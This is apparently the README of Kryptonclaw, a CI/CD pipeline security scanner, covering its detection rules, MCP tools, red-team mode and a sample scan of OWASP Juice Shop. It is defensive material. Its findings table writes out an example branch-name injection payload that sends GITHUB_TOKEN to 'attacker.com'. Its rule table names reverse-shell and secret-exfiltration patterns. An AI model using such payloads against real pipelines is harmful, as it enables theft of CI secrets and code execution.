kryptonclaw 0.1.0

# Kryptonclaw

**CI/CD Security Scanner for GitHub Actions, GitLab CI, and Jenkins**

Kryptonclaw detects 30+ attack patterns in CI/CD pipelines -- the same vectors used in the HackerBot-Claw campaign (Feb 2026) that compromised workflows across Microsoft, DataDog, CNCF, and Trivy repositories. It scans workflow files via the GitHub API without cloning repos, supports org-wide batch scanning, and outputs SARIF for direct GitHub Code Scanning integration.

```
$ kryptonclaw scan --repo juice-shop/juice-shop

Kryptonclaw Scan Report: juice-shop/juice-shop
Scanned 12 files across 1 repos in 253ms

Findings: 29 total (Critical: 0, High: 9, Medium: 20, Low: 0)
--------------------------------------------------------------------------------
[HIGH] Remote script execution (curl|bash, wget|sh) (KC-104)
  Location: .github/workflows/ci.yml
  Pipeline downloads and executes remote scripts via curl|bash or wget|sh.
  An attacker who compromises the remote URL can execute arbitrary code.
  Fix: Download scripts, verify checksums, then execute.
  CWE: CWE-829

[HIGH] Untrusted input in workflow expression (KC-101)
  Location: .github/workflows/ci.yml
  github.head_ref used in run: step — attacker-controlled branch names
  can inject shell commands via crafted PR branch names.
  Fix: Pass untrusted input via environment variable, not direct interpolation.
  CWE: CWE-94

[MED] Mutable tag reference (KC-003)
  Location: .github/workflows/ci.yml
  Action coverallsapp/github-action@v2 uses a mutable tag.
  Fix: Pin to a full commit SHA: uses: action@<40-char-sha>
  CWE: CWE-829
...
```

---

## Why Kryptonclaw

Most CI/CD security tools focus on container images or dependency scanning. They miss the pipeline itself — the YAML configuration files that define what code runs, with what permissions, and with access to what secrets.

Attackers know this. The HackerBot-Claw campaign exploited `pull_request_target` triggers to run malicious code with write access to base repositories. Unpinned GitHub Actions allowed supply chain poisoning through tag mutation. Workflow injection via `${{ github.event.pull_request.title }}` gave attackers command execution inside trusted pipelines.

Kryptonclaw catches all of these patterns and more. It applies both regex-based detection and YAML-aware structural analysis to find vulnerabilities that simple grep-based tools miss — like a `pull_request_target` trigger combined with `actions/checkout` referencing the PR head SHA in the same job.

**Key capabilities:**

- **API-first scanning** — Fetches workflow files via GitHub Contents API. No git clone, no disk I/O, no repository checkout.
- **Org-wide batch scanning** — Scan every repo in a GitHub organization with a single command. Configurable concurrency, rate-limit aware.
- **30+ detection rules** — GitHub Actions, GitLab CI, Jenkins, plus generic CI/CD patterns. Every rule mapped to CWE IDs with remediation guidance.
- **YAML structural analysis** — Parses workflows into typed structures to detect multi-step attack chains that span triggers, permissions, and steps.
- **SARIF v2.1.0 output** — Drop results directly into GitHub Code Scanning. Also supports JSON and human-readable text.
- **MCP server** — 10 tools for integration with AI assistants and automated security workflows.
- **Red team mode** — Optional exploit scenario generation via armyknife-llm-redteam bridge.

---

## Installation

### From crates.io

```bash
cargo install kryptonclaw
```

This installs both `kryptonclaw` (CLI) and `kryptonclaw-mcp` (MCP server) to `~/.cargo/bin/`.

### From source

```bash
git clone https://github.com/armyknife-social/kryptonclaw.git
cd kryptonclaw
cargo build --release

# Binaries at:
#   target/release/kryptonclaw       (CLI)
#   target/release/kryptonclaw-mcp   (MCP server)
```

Requires Rust 1.75 or later.

### Add to PATH

```bash
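# If installed from source, copy the binaries to a directory on your PATH
# (~/.local/bin here; create it first if it does not exist):
mkdir -p ~/.local/bin
cp target/release/kryptonclaw ~/.local/bin/
cp target/release/kryptonclaw-mcp ~/.local/bin/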
```

---

## Usage

### Scan a single repository

```bash
# API-only scan (no clone, fast)
kryptonclaw scan --repo owner/repo

# With explicit token
kryptonclaw scan --repo owner/repo --token "$GITHUB_TOKEN"
```

### Scan an entire organization

```bash
# Scan all repos in an org (default: 4 concurrent)
kryptonclaw scan --org my-company

# Higher concurrency for large orgs
kryptonclaw scan --org my-company --concurrency 8

# Only show high and critical findings
kryptonclaw scan --org my-company --min-severity high
```

### Scan a local directory

```bash
# Scan local .github/workflows/ files
kryptonclaw scan --path /path/to/repo

# Deep scan (walks entire directory tree)
kryptonclaw scan --path /path/to/repo --deep
```

### Output formats

```bash
# Human-readable (default)
kryptonclaw scan --repo owner/repo

# JSON (full report structure)
kryptonclaw scan --repo owner/repo --format json

# SARIF v2.1.0 (GitHub Code Scanning)
kryptonclaw scan --repo owner/repo --format sarif -o results.sarif
```

### Upload to GitHub Code Scanning

```bash
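kryptonclaw scan --repo owner/repo --format sarif -o results.sarif
# Upload through the REST API; the sarif field must be gzip-compressed and base64-encoded
gh api --method POST repos/owner/repo/code-scanning/sarifs -f ref=refs/heads/main \
  -f commit_sha="<commit-sha>" -f sarif="$(gzip -c results.sarif | base64 | tr -d '\n')"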
```

### List detection rules

```bash
kryptonclaw rules
```

```
Rule ID    Severity   CWE          Description
--------------------------------------------------------------------------------
KC-001     HIGH       CWE-269      workflow_run trigger (privilege escalation chain)
KC-002     HIGH       CWE-829      Unpinned action reference (branch/tag instead of SHA)
KC-003     MEDIUM     CWE-829      Mutable tag ref (e.g., @v4 instead of @v4.1.1 or full SHA)
KC-004     MEDIUM     CWE-494      Artifact upload/download without verification
KC-005     CRITICAL   CWE-94       actions/github-script with user-controlled input
...
```

### Red team mode

```bash
# Generate exploit scenarios for each finding
kryptonclaw scan --repo owner/repo --redteam
```

Requires `armyknife-llm-redteam-mcp` on PATH. When enabled, each finding is analyzed to produce a proof-of-concept attack scenario with MITRE ATT&CK mappings.

---

## Detection Rules

Kryptonclaw ships with 30+ rules organized by CI platform. Every rule includes a CWE mapping, severity classification, and remediation guidance.

### GitHub Actions

| Rule | Severity | CWE | Detection |
|------|----------|-----|-----------|
| KC-100 | Critical | 863 | `pull_request_target` trigger — runs with write access and base repo secrets |
| KC-005 | Critical | 94 | `actions/github-script` with user-controlled input — JS execution with full GITHUB_TOKEN |
| KC-102 | Critical | 200 | Secret exfiltration via `curl`/`wget` to external endpoints |
| KC-103 | Critical | 78 | Reverse shell patterns (`netcat -e`, `/dev/tcp/`) |
| KC-001 | High | 269 | `workflow_run` trigger — privilege escalation chain from fork PRs |
| KC-002 | High | 829 | Unpinned action refs (`@main`, `@master`) — mutable, supply chain risk |
| KC-008 | High | 20 | Composite action `${{ inputs.* }}` in `run:` steps without validation |
| KC-009 | High | 200 | `secrets: inherit` passes all repository secrets to called workflows |
| KC-010 | High | 269 | `permissions: write-all` grants GITHUB_TOKEN full access |
| KC-011 | High | 94 | Expanded context injection (`discussion.body`, `review.body`, `pages.*.page_name`) |
| KC-014 | High | 269 | OIDC `id-token: write` — over-scoped cloud provider access |
| KC-101 | High | 94 | Untrusted input injection (`issue.body`, `pull_request.title`, `head_ref`) |
| KC-104 | High | 829 | `curl \| bash` / `wget \| sh` — remote script execution |
| KC-105 | High | 200 | `ACTIONS_RUNTIME_TOKEN` exposure in logs or untrusted processes |
| KC-003 | Medium | 829 | Mutable tag refs (`@v4` instead of `@v4.1.1` or full SHA) |
| KC-004 | Medium | 494 | Artifact upload/download without checksum verification |
| KC-006 | Medium | 250 | Self-hosted runner usage — persistent state enables backdoors |
| KC-007 | Medium | 269 | Missing `permissions:` block — may default to `write-all` |
| KC-012 | Medium | 601 | Environment URL injection — phishing via deployment URLs |
| KC-013 | Medium | 345 | Cache poisoning via predictable `actions/cache` keys |
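
The difference between KC-002, KC-003, and a safely pinned action comes down to what follows the `@` in a `uses:` value. Below is a minimal Rust sketch of that classification. The `classify_action_ref` helper and `RefKind` enum are hypothetical names for illustration and are not taken from Kryptonclaw's source. The sketch treats every version-style tag as mutable, which is stricter than the KC-003 description, and the split between branches and tags is only a naming heuristic.

```rust
/// Hypothetical classification of the reference after `@` in a `uses:` value.
#[derive(Debug, PartialEq, Eq)]
enum RefKind {
    PinnedSha,  // full 40-character commit SHA (immutable)
    VersionTag, // e.g. v4 or v4.1.1 (a tag can be moved)
    BranchLike, // e.g. main, master, or any other name
    Missing,    // no `@ref` at all (for example a local action path)
}

fn classify_action_ref(uses: &str) -> RefKind {
    // Everything after the last `@` is the reference.
    let reference = match uses.rsplit_once('@') {
        Some((_, reference)) => reference,
        None => return RefKind::Missing,
    };

    // A full commit SHA is exactly 40 hexadecimal characters.
    let is_full_sha =
        reference.len() == 40 && reference.chars().all(|c| c.is_ascii_hexdigit());
    if is_full_sha {
        return RefKind::PinnedSha;
    }

    // Heuristic (an assumption): `v` followed by a digit looks like a version tag.
    let mut chars = reference.chars();
    let looks_like_version =
        chars.next() == Some('v') && chars.next().map_or(false, |c| c.is_ascii_digit());

    if looks_like_version {
        RefKind::VersionTag
    } else {
        RefKind::BranchLike
    }
}
```

For example, `classify_action_ref("coverallsapp/github-action@v2")` yields `RefKind::VersionTag`, while a reference ending in a 40-character hex string yields `RefKind::PinnedSha`.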

### GitLab CI

| Rule | Severity | CWE | Detection |
|------|----------|-----|-----------|
| KC-204 | High | 250 | `privileged: true` container execution — host escape risk |
| KC-200 | Medium | 829 | Remote/cross-project `include:` tampering |
| KC-201 | Medium | 693 | `allow_failure: true` on security scanning stages |
| KC-203 | Medium | 200 | Variable expansion without protected/masked CI/CD variables |
| KC-205 | Medium | 200 | Trigger tokens referenced directly instead of as protected variables |
| KC-202 | Low | 693 | Manual security gates that can be skipped |

### Jenkins

| Rule | Severity | CWE | Detection |
|------|----------|-----|-----------|
| KC-300 | Critical | 829 | `@Grab` dependency injection — arbitrary runtime downloads |
| KC-301 | High | 78 | Shell injection via Groovy string interpolation in `sh` steps |
| KC-304 | High | 693 | `@NonCPS` Groovy sandbox bypass — arbitrary code on controller |
| KC-306 | High | 269 | Admin permission checks in pipeline code |
| KC-302 | Medium | 829 | Dynamic `load()` pipeline library loading |
| KC-305 | Medium | 829 | `@Library` without version pin — mutable default branch |
| KC-303 | Low | 200 | `withCredentials` scope too broad |

### YAML Structural Analysis

Beyond regex matching, Kryptonclaw parses GitHub Actions workflows into typed structures and applies semantic checks:

- **HackerBot-Claw pattern detection**: Identifies `pull_request_target` trigger combined with `actions/checkout` referencing `github.event.pull_request.head.sha` or `github.head_ref` in the same job. This is the exact attack chain used in the Feb 2026 campaign.
- **Composite input injection**: Detects `${{ inputs.* }}` interpolation in `run:` steps across parsed job definitions.
- **Workflow dispatch input injection**: Finds `${{ github.event.inputs.* }}` used directly in shell commands.

Structural analysis catches patterns that span multiple YAML keys and cannot be reliably detected with single-line regex.
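
The `pull_request_target` check described above can be sketched over an already-parsed workflow. The `Workflow`, `Job`, and `Step` types and the `risky_checkout_jobs` function below are hypothetical simplifications for illustration, not Kryptonclaw's actual parser types. YAML parsing itself is assumed to have happened elsewhere.

```rust
/// Hypothetical, simplified model of a parsed workflow step.
#[derive(Debug, Default)]
struct Step {
    uses: Option<String>,         // e.g. "actions/checkout@v4"
    checkout_ref: Option<String>, // value of `with: ref:`, if present
}

#[derive(Debug, Default)]
struct Job {
    name: String,
    steps: Vec<Step>,
}

#[derive(Debug, Default)]
struct Workflow {
    triggers: Vec<String>, // keys found under `on:`
    jobs: Vec<Job>,
}

/// Expressions that resolve to attacker-controlled PR code.
const PR_HEAD_REFS: [&str; 2] = ["github.event.pull_request.head.sha", "github.head_ref"];

/// Returns the names of jobs that check out PR head code while the
/// workflow is triggered by `pull_request_target`.
fn risky_checkout_jobs(wf: &Workflow) -> Vec<&str> {
    // The trigger lives at workflow level, so check it once.
    if !wf.triggers.iter().any(|t| t == "pull_request_target") {
        return Vec::new();
    }
    wf.jobs
        .iter()
        .filter(|job| {
            job.steps.iter().any(|step| {
                let is_checkout = step
                    .uses
                    .as_deref()
                    .map_or(false, |u| u.starts_with("actions/checkout@"));
                let uses_pr_head = step
                    .checkout_ref
                    .as_deref()
                    .map_or(false, |r| PR_HEAD_REFS.iter().any(|p| r.contains(*p)));
                is_checkout && uses_pr_head
            })
        })
        .map(|job| job.name.as_str())
        .collect()
}
```

The check needs the trigger (a workflow-level key) and the checkout reference (a step-level key) at the same time, which is why a single-line pattern cannot express it.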

### Additional Scanners

Kryptonclaw also includes:

- **Secrets scanner** — 12 credential patterns (AWS keys, GitHub PATs, Slack tokens, OpenAI keys, private keys, database passwords). Applied to all scanned files.
- **Supply chain scanner** — 40+ known typosquatted package names, malicious lifecycle hooks, custom registry detection, dependency confusion patterns. Covers npm, PyPI, Cargo, Go modules, RubyGems.

---

## Supported CI/CD Platforms

| Platform | File Detection | Rules |
|----------|----------------|-------|
| GitHub Actions | `.github/workflows/*.yml` | 20 dedicated + generic |
| GitLab CI | `.gitlab-ci.yml` | 6 dedicated + generic |
| Jenkins | `Jenkinsfile`, `Jenkinsfile.*` | 7 dedicated + generic |
| Travis CI | `.travis.yml` | Generic patterns |
| CircleCI | `.circleci/*.yml` | Generic patterns |
| Azure Pipelines | `azure-pipelines.yml` | Generic patterns |

Platform detection works by file path and, for ambiguous YAML files, by content heuristics (`runs-on:` + `steps:` = GitHub Actions, `stages:` + `script:` = GitLab CI).
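
The path-then-content order described above could look roughly like the following Rust sketch. `Platform` and `detect_platform` are hypothetical names, only three of the platforms from the table are covered, and accepting `.yaml` as well as `.yml` is an assumption.

```rust
#[derive(Debug, PartialEq, Eq)]
enum Platform {
    GitHubActions,
    GitLabCi,
    Jenkins,
    Unknown,
}

/// Guess the CI platform from the file path first, then from content markers.
fn detect_platform(path: &str, content: &str) -> Platform {
    let file_name = path.rsplit('/').next().unwrap_or(path);
    // Assumption: treat both .yml and .yaml as YAML.
    let is_yaml = file_name.ends_with(".yml") || file_name.ends_with(".yaml");

    // Path-based detection, following the table above.
    if path.contains(".github/workflows/") && is_yaml {
        return Platform::GitHubActions;
    }
    if file_name == ".gitlab-ci.yml" {
        return Platform::GitLabCi;
    }
    if file_name == "Jenkinsfile" || file_name.starts_with("Jenkinsfile.") {
        return Platform::Jenkins;
    }

    // Content heuristics for YAML files whose path is not conclusive.
    if is_yaml {
        if content.contains("runs-on:") && content.contains("steps:") {
            return Platform::GitHubActions;
        }
        if content.contains("stages:") && content.contains("script:") {
            return Platform::GitLabCi;
        }
    }
    Platform::Unknown
}
```

Checking the path first keeps the common case cheap. The substring heuristics only run for YAML files that the path rules did not already classify.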

---

## MCP Server

Kryptonclaw includes a Model Context Protocol server with 10 tools for integration with AI assistants and automated security workflows.

```bash
# Start the MCP server
kryptonclaw-mcp
```

### MCP Configuration

Add to your MCP client configuration:

```json
{
  "mcpServers": {
    "kryptonclaw": {
      "type": "stdio",
      "command": "kryptonclaw-mcp",
      "args": []
    }
  }
}
```

### Available Tools

| Tool | Description |
|------|-------------|
| `kryptonclaw_scan_repo` | Scan a single repo via GitHub Contents API |
| `kryptonclaw_scan_org` | Scan all repos in a GitHub organization |
| `kryptonclaw_scan_workflow` | Scan raw workflow YAML content (paste directly) |
| `kryptonclaw_findings` | Query and filter findings from the last scan |
| `kryptonclaw_rules` | List all detection rules with metadata |
| `kryptonclaw_explain` | Explain a rule by ID with full remediation guidance |
| `kryptonclaw_redteam` | Generate exploit scenario for a specific finding |
| `kryptonclaw_sarif` | Export last scan as SARIF v2.1.0 JSON |
| `kryptonclaw_status` | Show scan status and cached findings count |
| `kryptonclaw_config` | Get configuration values |

All tools accept a `token` parameter or fall back to the `GITHUB_TOKEN` / `GH_TOKEN` environment variable. Output is automatically sanitized to redact credentials.
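
As an illustration of what credential redaction can involve, here is a minimal Rust sketch that masks GitHub-style tokens by their well-known prefixes. The `redact_tokens` function is hypothetical and is not Kryptonclaw's sanitizer. It covers GitHub token prefixes only and will also mask unrelated words that happen to contain one of them.

```rust
/// Prefixes used by GitHub-issued tokens.
const TOKEN_PREFIXES: [&str; 6] = ["ghp_", "gho_", "ghu_", "ghs_", "ghr_", "github_pat_"];

/// Replace anything that looks like a GitHub token with "[REDACTED]".
fn redact_tokens(text: &str) -> String {
    let mut out = String::with_capacity(text.len());
    let mut rest = text;
    loop {
        // Find the earliest occurrence of any known prefix.
        let next = TOKEN_PREFIXES.iter().filter_map(|p| rest.find(*p)).min();
        let start = match next {
            Some(idx) => idx,
            None => {
                // No more tokens: copy the remainder unchanged.
                out.push_str(rest);
                return out;
            }
        };
        out.push_str(&rest[..start]);
        out.push_str("[REDACTED]");

        // Skip the token body: the run of ASCII alphanumerics and underscores.
        let token_len = rest[start..]
            .find(|c: char| !(c.is_ascii_alphanumeric() || c == '_'))
            .unwrap_or(rest.len() - start);
        rest = &rest[start + token_len..];
    }
}
```

A production sanitizer would likely also validate token length and cover other credential formats. This sketch only shows the scan-and-replace shape.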

---

## Architecture

```
kryptonclaw
├── cli/                    Command-line interface (clap 4)
├── core/                   Engine, findings, config, reports
├── plugins/
│   └── builtin/
│       ├── cicd/           CI/CD scanner (regex + YAML parser)
│       │   ├── github_actions.rs
│       │   ├── gitlab_ci.rs
│       │   ├── jenkins.rs
│       │   ├── parser.rs   YAML structural analysis
│       │   └── rules.rs    Rule definitions + matching engine
│       ├── secrets.rs      Credential pattern detection
│       └── supply_chain.rs Package supply chain analysis
├── platform/               GitHub API client (Contents API, org listing)
├── scan/                   API-only and batch scanning orchestration
├── mcp/                    MCP server (10 tools, rmcp 0.16)
├── output/                 Text, JSON, SARIF formatters
└── redteam/                armyknife-llm-redteam bridge
```

**Design principles:**

- **API-first**: Default scanning mode uses the GitHub Contents API. No git clone, no disk writes, no repository checkout. This makes org-wide scanning fast and safe.
- **Defense in depth**: Regex rules catch known patterns fast. YAML parsing catches structural patterns that span multiple keys. Both run on every file.
- **Fail open on parsing**: Malformed YAML (sometimes intentional in attack scenarios) falls back to regex-only scanning rather than skipping the file.
- **Rate limit awareness**: The GitHub API client tracks remaining requests via `x-ratelimit-remaining` headers. Scanning stops gracefully when the budget is exhausted instead of retrying requests that GitHub would reject with 403 responses.
- **Async throughout**: Built on Tokio with async HTTP, async plugin execution, and async batch orchestration.
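
The rate-limit principle above can be sketched as a small decision function in Rust. The names `parse_remaining` and `should_continue`, the `reserve` parameter, and the choice to keep going when the header is missing are all assumptions for illustration. The actual client may behave differently.

```rust
/// Parse the `x-ratelimit-remaining` header value, if present and numeric.
fn parse_remaining(header_value: Option<&str>) -> Option<u32> {
    header_value.and_then(|v| v.trim().parse().ok())
}

/// Decide whether to issue `needed` more requests while keeping `reserve`
/// requests in hand. An unknown budget (missing or malformed header) is
/// treated as "continue" in this sketch.
fn should_continue(header_value: Option<&str>, needed: u32, reserve: u32) -> bool {
    match parse_remaining(header_value) {
        Some(remaining) => remaining >= needed.saturating_add(reserve),
        None => true,
    }
}
```

Calling `should_continue(Some("40"), 10, 50)` returns `false`, so a batch scan would stop before starting a repo it cannot finish within the budget.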

---

## Environment Variables

| Variable | Purpose |
|----------|---------|
| `GITHUB_TOKEN` | GitHub API authentication (primary) |
| `GH_TOKEN` | GitHub API authentication (fallback) |

---

## SARIF Integration

Kryptonclaw produces SARIF v2.1.0 output compatible with GitHub Code Scanning, VS Code SARIF Viewer, and other SARIF-consuming tools.

SARIF output includes:
- `reportingDescriptor` entries for each rule with ID, description, severity, and CWE tags
- `result` entries for each finding with physical location (file path + line number)
- Severity mapping: Critical/High to `error`, Medium to `warning`, Low/Info to `note`
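
The severity mapping in the last bullet is small enough to write out in full. This Rust sketch uses hypothetical `Severity` and `sarif_level` names. The returned strings are the standard SARIF `level` values.

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
enum Severity {
    Critical,
    High,
    Medium,
    Low,
    Info,
}

/// Map a finding severity to a SARIF v2.1.0 `level` string.
fn sarif_level(severity: Severity) -> &'static str {
    match severity {
        Severity::Critical | Severity::High => "error",
        Severity::Medium => "warning",
        Severity::Low | Severity::Info => "note",
    }
}
```

Because the `match` is exhaustive, adding a new severity variant would fail to compile until it is given a SARIF level.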

```bash
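# Generate SARIF, then upload to GitHub Code Scanning through the REST API
# (the sarif field must be gzip-compressed and base64-encoded)
kryptonclaw scan --org my-company --format sarif -o scan.sarif
gh api --method POST "repos/my-company/<repo>/code-scanning/sarifs" -f ref=refs/heads/main \
  -f commit_sha="<commit-sha>" -f sarif="$(gzip -c scan.sarif | base64 | tr -d '\n')"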
```

---

## Performance

| Scenario | Typical Time |
|----------|-------------|
| Single repo (API-only, 3 workflow files) | 1-2 seconds |
| Organization (50 repos) | 2-5 minutes |
| Organization (200 repos, concurrency 8) | 8-15 minutes |
| Local directory scan | < 1 second |

Rate limits: the GitHub API allows 5,000 requests per hour for authenticated users. Each repo scan uses 2-10 API calls depending on workflow count. A 200-repo org scan uses roughly 1,000-2,000 API calls.
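
The budget arithmetic can be checked with a short Rust sketch. `api_call_range` and `fits_hourly_budget` are hypothetical helpers. Multiplying out the per-repo figure gives bounds of 400 to 2,000 calls for 200 repos, so the 1,000-2,000 estimate sits in the upper part of that range.

```rust
/// Lower and upper bound on API calls for `repos` repositories,
/// given the per-repo minimum and maximum.
fn api_call_range(repos: u32, min_per_repo: u32, max_per_repo: u32) -> (u32, u32) {
    (repos * min_per_repo, repos * max_per_repo)
}

/// True if even the worst case fits within the hourly request budget.
fn fits_hourly_budget(repos: u32, max_per_repo: u32, hourly_limit: u32) -> bool {
    repos * max_per_repo <= hourly_limit
}
```

With these figures a 200-repo scan fits within a single 5,000-request hour even in the worst case, while an org of more than 500 repos could exceed it.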

---

## Real-World Test: OWASP Juice Shop

To validate detection accuracy, Kryptonclaw was run against [OWASP Juice Shop](https://github.com/juice-shop/juice-shop), one of the most popular intentionally vulnerable web applications. The project is maintained by the OWASP Foundation and has 12 GitHub Actions workflow files.

```
$ kryptonclaw scan --repo juice-shop/juice-shop

Kryptonclaw Scan Report: juice-shop/juice-shop
Scanned 12 files across 1 repos in 253ms

Findings: 29 total (Critical: 0, High: 9, Medium: 20, Low: 0)
```

### Findings Breakdown

**HIGH severity (9 findings)**

| Rule | File | Finding |
|------|------|---------|
| KC-104 | `ci.yml` | `curl \| bash` remote script execution -- Heroku CLI install via `curl https://cli-assets.heroku.com/install.sh \| sh` downloads and executes a remote script without checksum verification. If the Heroku CDN is compromised, arbitrary code runs inside the CI pipeline with full access to secrets. |
| KC-101 | `ci.yml` | Branch name injection via `github.head_ref`: the workflow interpolates `${{ github.head_ref }}` directly into a `run:` step. Git ref names cannot contain spaces or `?`, so a realistic payload uses `${IFS}` instead: an attacker can craft a PR with a branch name like `x$(curl${IFS}attacker.com/$GITHUB_TOKEN)` to run commands and exfiltrate any secrets exposed to that step. |
| KC-101 | `codeql-analysis.yml` | Same `github.head_ref` injection pattern in the CodeQL analysis workflow. |
| KC-101 | `rebase-nightly.yml` | Same pattern -- branch name interpolation in the nightly rebase workflow. |
| KC-101 | `update-challenges.yml` | Same pattern in the challenge update workflow. |
| KC-101 | `lint-fixer.yml` | Same pattern in the lint auto-fix workflow. |
| KC-101 | `test-desktop-app.yml` | Same pattern in the Electron desktop app test workflow. |
| KC-101 | `update-challenges-on-comment.yml` | Same pattern triggered by issue comments. |
| KC-104 | `release.yml` | Second `curl \| bash` instance in the release workflow. |

**MEDIUM severity (20 findings)**

| Rule | Count | Finding |
|------|-------|---------|
| KC-007 | 10 | Missing `permissions:` block -- 10 of 12 workflow files have no explicit permissions declaration. When the repository's default token permissions are set to "read and write," every workflow runs with full write access to the repository, packages, and deployments. |
| KC-003 | 6 | Mutable tag references -- Actions like `coverallsapp/github-action@v2`, `github/codeql-action/init@v3`, and `github/codeql-action/analyze@v3` use major version tags instead of full commit SHAs. If a tag is force-pushed by a compromised maintainer, the workflow silently runs different code. |
| KC-004 | 4 | Artifact upload/download without verification -- `actions/upload-artifact` and `actions/download-artifact` used without checksum verification. Artifacts can be tampered with between upload and download in multi-job workflows. |

### Key Takeaways

1. **Branch name injection is systemic.** 7 of 12 workflows interpolate `github.head_ref` directly into shell commands. This is the same class of vulnerability that enabled the HackerBot-Claw campaign -- attackers control the branch name, and the branch name becomes code.

2. **Remote script execution is a real supply chain risk.** The Heroku CLI install via `curl | sh` trusts a third-party CDN to deliver unmodified code. A compromised CDN or DNS hijack gives an attacker code execution inside CI with access to deployment credentials.

3. **Missing permissions declarations are pervasive.** 10 of 12 workflows rely on repository defaults instead of explicitly scoping GITHUB_TOKEN permissions. The principle of least privilege is not applied.

4. **Mutable action references enable silent supply chain attacks.** Using `@v2` or `@v3` instead of pinned commit SHAs means a compromised upstream action can inject malicious code into every workflow run without any visible change in the workflow file.

5. **Scan completed in 253ms** via the GitHub Contents API -- no repository clone, no disk I/O, 12 files fetched and analyzed across 30+ detection rules.
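
The branch name injection in takeaway 1 is detectable because the untrusted value appears inside a `${{ ... }}` expression in a `run:` script. Below is a minimal Rust sketch of that check. The `untrusted_expressions` function is hypothetical and the context list is a partial one drawn from the KC-101 description. It is not Kryptonclaw's rule implementation.

```rust
/// Contexts an attacker can influence (a partial, illustrative list).
const UNTRUSTED_CONTEXTS: [&str; 3] = [
    "github.head_ref",
    "github.event.pull_request.title",
    "github.event.issue.body",
];

/// Return every `${{ ... }}` expression in `run_script` that references
/// an untrusted context.
fn untrusted_expressions(run_script: &str) -> Vec<&str> {
    let mut found = Vec::new();
    let mut rest = run_script;
    while let Some(start) = rest.find("${{") {
        let after_open = &rest[start + 3..];
        let end = match after_open.find("}}") {
            Some(end) => end,
            None => break, // unterminated expression: stop scanning
        };
        let expr = after_open[..end].trim();
        if UNTRUSTED_CONTEXTS.iter().any(|ctx| expr.contains(*ctx)) {
            found.push(expr);
        }
        // Continue after the closing braces.
        rest = &after_open[end + 2..];
    }
    found
}
```

A script that reads the same value from an environment variable, such as `echo "$BRANCH"`, produces no matches. That is the remediation KC-101 recommends.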

---

## Contributing

Contributions are welcome. To add a new detection rule:

1. Choose the appropriate module (`github_actions.rs`, `gitlab_ci.rs`, `jenkins.rs`, or `rules.rs` for generic patterns)
2. Add a `RegexRule` entry with: rule ID (`KC-NNN`), regex pattern, title, severity, description, remediation, CWE IDs
3. Add rule metadata to `all_rules()` in `rules.rs`
4. Add a test case in `cicd/mod.rs`
5. Run `cargo test` to verify

---

## License

Dual-licensed under either [MIT](LICENSE-MIT) or [Apache 2.0](LICENSE-APACHE), at your option.